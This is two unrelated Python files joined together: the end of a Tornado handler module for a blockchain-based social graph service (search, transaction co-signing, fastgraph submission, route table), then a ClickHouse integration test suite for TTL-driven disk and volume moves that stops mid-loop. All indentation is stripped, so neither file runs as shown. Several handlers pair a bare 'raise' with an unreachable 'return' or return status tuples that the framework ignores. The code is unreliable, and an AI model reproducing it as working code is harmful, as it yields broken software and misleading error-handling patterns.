self.render_as_json(graph.to_dict())
class GraphMessagesHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
await graph.get_messages()
self.render_as_json(graph.to_dict())
class GraphGroupMessagesHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_group_messages()
self.render_as_json(graph.to_dict())
class GraphNewMessagesHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_new_messages()
self.render_as_json(graph.to_dict())
class GraphCommentsHandler(BaseGraphHandler):
async def post(self):
graph = self.get_base_graph()
graph.get_comments()
self.render_as_json(graph.to_dict())
class GraphReactsHandler(BaseGraphHandler):
async def post(self):
graph = self.get_base_graph()
graph.get_reacts()
self.render_as_json(graph.to_dict())
class SearchHandler(BaseHandler):
async def get(self):
config = self.config
phrase = self.get_query_argument('phrase', None)
requester_rid = self.get_query_argument('requester_rid', None)
if not phrase and not requester_rid:
return 'phrase required', 400
bulletin_secret = self.get_query_argument('bulletin_secret').replace(' ', '+')
if not bulletin_secret:
return 'bulletin_secret required', 400
my_bulletin_secret = config.get_bulletin_secret()
if requester_rid:
friend = [x for x in GU().search_rid(requester_rid)][0]
requester_rid = friend['rid']
rids = sorted([str(my_bulletin_secret), str(bulletin_secret)], key=str.lower)
requested_rid = hashlib.sha256(rids[0].encode() + rids[1].encode()).hexdigest()
else:
rids = sorted([str(my_bulletin_secret), str(bulletin_secret)], key=str.lower)
requester_rid = hashlib.sha256(rids[0].encode() + rids[1].encode()).hexdigest()
friend = [x for x in GU().search_username(phrase)][0]
requested_rid = friend['rid']
if friend:
to = [x['to'] for x in friend['outputs'] if x['to'] != config.address][0]
else:
return '{}', 404
self.render_as_json({
'bulletin_secret': friend['relationship']['their_bulletin_secret'],
'requested_rid': requested_rid,
'requester_rid': requester_rid,
'to': to,
'username': friend['relationship']['their_username']
})
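# Co-signing endpoint: verifies the requester's relationship and signatures,
# checks that the referenced input is still unspent, then signs the transaction
# hash with the server's private key.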
class SignRawTransactionHandler(BaseHandler):
async def post(self):
config = self.config
mongo = self.config.mongo
body = json.loads(self.request.body.decode('utf-8'))
try:
fg = FastGraph.from_dict(0, body.get('txn'), raw=True)
fg.verify()
except:
raise
return 'invalid transaction', 400
res = mongo.db.signed_transactions.find_one({'hash': body.get('hash')})
if res:
return 'no', 400
try:
rid = TU.generate_rid(config, body.get('bulletin_secret'))
my_entry_for_relationship = GU().get_transaction_by_rid(rid, config.wif, rid=True, my=True, public_key=config.public_key)
their_entry_for_relationship = GU().get_transaction_by_rid(rid, rid=True, raw=True, theirs=True, public_key=config.public_key)
verified = verify_signature(
base64.b64decode(body.get('bulletin_secret')),
my_entry_for_relationship['relationship']['their_username'].encode(),
bytes.fromhex(their_entry_for_relationship['public_key'])
)
if not verified:
return 'no', 400
verified = verify_signature(
base64.b64decode(body.get('id')),
body.get('hash').encode('utf-8'),
bytes.fromhex(their_entry_for_relationship['public_key'])
)
address = str(P2PKHBitcoinAddress.from_pubkey(bytes.fromhex(their_entry_for_relationship['public_key'])))
found = False
for x in BU().get_wallet_unspent_transactions(address, [body.get('input')]):
if body.get('input') == x['id']:
found = True
if not found:
for x in BU().get_wallet_unspent_fastgraph_transactions(address):
if body.get('input') == x['id']:
found = True
if found:
signature = mongo.db.signed_transactions.find_one({
'input': body.get('input'),
'txn.public_key': body['txn']['public_key']
})
if signature:
already_spent = mongo.db.fastgraph_transactions.find_one({
'txn.inputs.id': body['input'],
'txn.public_key': body['txn']['public_key']
})
if already_spent:
self.set_status(400)
self.write('already spent!')
self.finish()
return True
else:
signature['txn']['signatures'] = [signature['signature']]
fastgraph = FastGraph.from_dict(0, signature['txn'])
try:
fastgraph.verify()
except Exception as e:
raise
return 'did not verify', 400
result = mongo.db.fastgraph_transactions.find_one({
'txn.hash': fastgraph.hash
})
if result:
return 'duplicate transaction found', 400
spent_check = mongo.db.fastgraph_transactions.find_one({
'txn.inputs.id': {'$in': [x.id for x in fastgraph.inputs]}
})
if spent_check:
return 'already spent input', 400
fastgraph.save()
else:
return 'no transactions with this input found', 400
if verified:
transaction_signature = TU.generate_signature_with_private_key(config.private_key, body.get('hash'))
signature = {
'signature': transaction_signature,
'hash': body.get('hash'),
'bulletin_secret': body.get('bulletin_secret'),
'input': body.get('input'),
'id': body.get('id'),
'txn': body.get('txn')
}
mongo.db.signed_transactions.insert(signature)
if '_id' in signature:
del signature['_id']
self.render_as_json(signature, indent=4)
else:
return 'no', 400
except Exception as e:
raise
self.render_as_json({
'status': 'error',
'msg': e
})
class FastGraphHandler(BaseGraphHandler):
async def post(self):
# after the necessary signatures are gathered, the transaction is sent here.
mongo = self.config.mongo
graph = self.get_base_graph()
fastgraph = json.loads(self.request.body.decode('utf-8'))
fastgraph = FastGraph.from_dict(0, fastgraph)
try:
fastgraph.verify()
except Exception as e:
raise
return 'did not verify', 400
result = mongo.db.fastgraph_transactions.find_one({
'txn.hash': fastgraph.hash
})
if result:
return 'duplicate transaction found', 400
spent_check = mongo.db.fastgraph_transactions.find_one({
'public_key': fastgraph.public_key,
'txn.inputs.id': {'$in': [x.id for x in fastgraph.inputs]}
})
if spent_check:
return 'already spent input', 400
fastgraph.save()
# TODO: use new peer framework to broadcast fastgraph transactions
#fastgraph.broadcast()
self.render_as_json(fastgraph.to_dict())
try:
await self.config.push_service.do_push(fastgraph.to_dict(), self.bulletin_secret, self.app_log)
except Exception as e:
self.app_log.error(e)
# these routes are placed in the order of operations for getting started.
GRAPH_HANDLERS = [
(r'/yada_config.json', GraphConfigHandler), # first the config is requested
(r'/get-graph-info', GraphInfoHandler), # then basic graph info is requested. Giving existing relationship information, if present.
(r'/get-graph-wallet', GraphRIDWalletHandler), # request balance and UTXOs
    (r'/register', RegistrationHandler), # if a relationship is not present, we "register": the client requests the information necessary to generate a friend request transaction
(r'/transaction', GraphTransactionHandler), # first the client submits their friend request transaction.
    (r'/create-relationship', CreateRelationshipHandler), # this generates and submits a friend accept transaction. You're done registering once these are on the blockchain.
(r'/get-graph-sent-friend-requests', GraphSentFriendRequestsHandler), # get all friend requests I've sent
(r'/get-graph-friend-requests', GraphFriendRequestsHandler), # get all friend requests sent to me
    (r'/get-graph-friends', GraphFriendsHandler), # get client/server relationship. Same as get-graph-info, but here for semantic purposes
(r'/get-graph-posts', GraphPostsHandler), # get posts from friends that are mutual friends of client/server
(r'/get-graph-messages', GraphMessagesHandler), # get messages from friends
(r'/get-graph-new-messages', GraphNewMessagesHandler), # get new messages that are newer than a given timestamp
(r'/get-graph-reacts', GraphReactsHandler), # get reacts for posts and comments
(r'/get-graph-comments', GraphCommentsHandler), # get comments for posts
(r'/search', SearchHandler), # search by username for friend of server. Server provides necessary information to generate friend request transaction, just like /register for the server.
(r'/sign-raw-transaction', SignRawTransactionHandler), # server signs the client transaction
(r'/post-fastgraph-transaction', FastGraphHandler), # fastgraph transaction is submitted by client
]
|
test.py
|
import json
import pytest
import random
import re
import string
import threading
import time
from multiprocessing.dummy import Pool
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def get_random_string(length):
    # Random uppercase/digit string of the requested length.
    symbols = string.ascii_uppercase + string.digits
    return ''.join(random.choice(symbols) for _ in range(length))
def get_used_disks_for_table(node, table_name, partition=None):
if partition is None:
suffix = ""
else:
suffix = "and partition='{}'".format(partition)
return node.query("""
SELECT disk_name
FROM system.parts
WHERE table == '{name}' AND active=1 {suffix}
ORDER BY modification_time
""".format(name=table_name, suffix=suffix)).strip().split('\n')
def check_used_disks_with_retry(node, table_name, expected_disks, retries):
for _ in range(retries):
used_disks = get_used_disks_for_table(node, table_name)
if set(used_disks) == expected_disks:
return True
time.sleep(0.5)
return False
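# Common pattern for the tests below: create a table with a "TTL ... TO DISK/VOLUME"
# clause, insert rows whose TTL has (or has not) expired, and assert which disks
# hold the active parts.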
@pytest.mark.parametrize("name,engine,alter", [
("mt_test_rule_with_invalid_destination","MergeTree()",0),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",0),
("mt_test_rule_with_invalid_destination","MergeTree()",1),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",1),
])
def test_rule_with_invalid_destination(started_cluster, name, engine, alter):
try:
def get_command(x, policy):
x = x or ""
if alter and x:
return """
ALTER TABLE {name} MODIFY TTL {expression}
""".format(expression=x, name=name)
else:
return """
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
{expression}
SETTINGS storage_policy='{policy}'
""".format(expression=x, name=name, engine=engine, policy=policy)
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'jbod1'", "only_jbod2"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'external'", "only_jbod2"))
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_do_not_work', '1')",0),
("mt_test_inserts_to_disk_work","MergeTree()",1),
("replicated_mt_test_inserts_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_work', '1')",1),
])
def test_inserts_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
try:
node1.query("DROP TABLE IF EXISTS {}".format(name))
except:
pass
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_do_not_work', '1')",0),
("mt_test_moves_to_disk_work","MergeTree()",1),
("replicated_mt_test_moves_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_work', '1')",1),
])
def test_moves_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 12
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_volume_work","MergeTree()"),
("replicated_mt_test_moves_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_volume_work', '1')"),
])
def test_moves_to_volume_work(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for p in range(2):
data = [] # 10MB in total
for i in range(5):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {'jbod1', 'jbod2'}
wait_expire_1_thread.join()
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_volume_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_volume_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_do_not_work', '1')",0),
("mt_test_inserts_to_volume_work","MergeTree()",1),
("replicated_mt_test_inserts_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_work', '1')",1),
])
def test_inserts_to_volume_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {name}".format(name=name))
for p in range(2):
data = [] # 20MB in total
for i in range(10):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "20"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_disk_eventually_work","MergeTree()"),
("replicated_mt_test_moves_to_disk_eventually_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_eventually_work', '1')"),
])
def test_moves_to_disk_eventually_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("DROP TABLE {}".format(name_temp))
time.sleep(2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
def test_replicated_download_ttl_info(started_cluster):
name = "test_replicated_ttl_info"
engine = "ReplicatedMergeTree('/clickhouse/test_replicated_download_ttl_info', '{replica}')"
try:
for i, node in enumerate((node1, node2), start=1):
node.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {}".format(name))
node2.query("INSERT INTO {} (s1, d1) VALUES ('{}', toDateTime({}))".format(name, get_random_string(1024 * 1024), time.time()-100))
assert set(get_used_disks_for_table(node2, name)) == {"external"}
time.sleep(1)
assert node1.query("SELECT count() FROM {}".format(name)).splitlines() == ["1"]
assert set(get_used_disks_for_table(node1, name)) == {"external"}
finally:
for node in (node1, node2):
try:
node.query("DROP TABLE IF EXISTS {}".format(name))
except:
continue
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_merges_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_merges_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_do_not_work', '1')",0),
("mt_test_merges_to_disk_work","MergeTree()",1),
("replicated_mt_test_merges_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_work', '1')",1),
])
def test_merges_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 16MB in total
for i in range(8):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
node1.query("SYSTEM START MERGES {}".format(name))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "16"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_merges_with_full_disk_work","MergeTree()"),
("replicated_mt_test_merges_with_full_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_with_full_disk_work', '1')"),
])
def test_merges_with_full_disk_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 12MB in total
for i in range(6):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
        assert set(used_disks) == {"jbod1"} # Merged to the same disk against the TTL rule because the destination disk is full.
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "12"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_after_merges_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_after_merges_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_do_not_work', '1')",0),
("mt_test_moves_after_merges_work","MergeTree()",1),
("replicated_mt_test_moves_after_merges_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_work', '1')",1),
])
def test_moves_after_merges_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 14MB in total
for i in range(7):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "14"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive,bar", [
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"DELETE"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"DELETE"),
("mt_test_moves_after_alter_work","MergeTree()",1,"DELETE"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"DELETE"),
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"TO DISK 'external'"),
("mt_test_moves_after_alter_work","MergeTree()",1,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"TO DISK 'external'"),
])
def test_ttls_do_not_work_after_alter(started_cluster, name, engine, positive, bar):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
if positive:
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 + INTERVAL 15 MINUTE {bar}
""".format(name=name, bar=bar)) # That shall disable TTL.
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1" if positive else "external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_materialize_ttl_in_partition","MergeTree()"),
("replicated_mt_test_materialize_ttl_in_partition","ReplicatedMergeTree('/clickhouse/test_materialize_ttl_in_partition', '1')"),
])
def test_materialize_ttl_in_partition(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int8,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY p1
PARTITION BY p1
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 5MB in total
for i in range(5):
data.append((str(i), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 TO DISK 'external' SETTINGS materialize_ttl_after_modify = 0
""".format(name=name))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 2
""".format(name=name))
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 4
""".format(name=name))
time.sleep(0.5)
used_disks_sets = []
for i in range(len(data)):
used_disks_sets.append(set(get_used_disks_for_table(node1, name, partition=i)))
assert used_disks_sets == [{"jbod1"}, {"jbod1"}, {"external"}, {"jbod1"}, {"external"}]
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == str(len(data))
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_multiple_ttls_positive", "MergeTree()", True),
("mt_replicated_test_alter_multiple_ttls_positive", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_positive', '1')", True),
("mt_test_alter_multiple_ttls_negative", "MergeTree()", False),
("mt_replicated_test_alter_multiple_ttls_negative", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_negative', '1')", False),
])
def test_alter_multiple_ttls(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that when multiple TTL expressions are set
and before any parts are inserted the TTL expressions
are changed with ALTER command then all old
TTL expressions are removed and the
the parts are moved to the specified disk or volume or
deleted if the new TTL expression is triggered
and are not moved or deleted when it is not.
"""
now = time.time()
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 + INTERVAL 34 SECOND TO DISK 'jbod2',
d1 + INTERVAL 64 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 14 SECOND TO VOLUME 'external',
d1 + INTERVAL 19 SECOND DELETE
""".format(name=name))
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
p1 = p
s1 = get_random_string(1024 * 1024) # 1MB
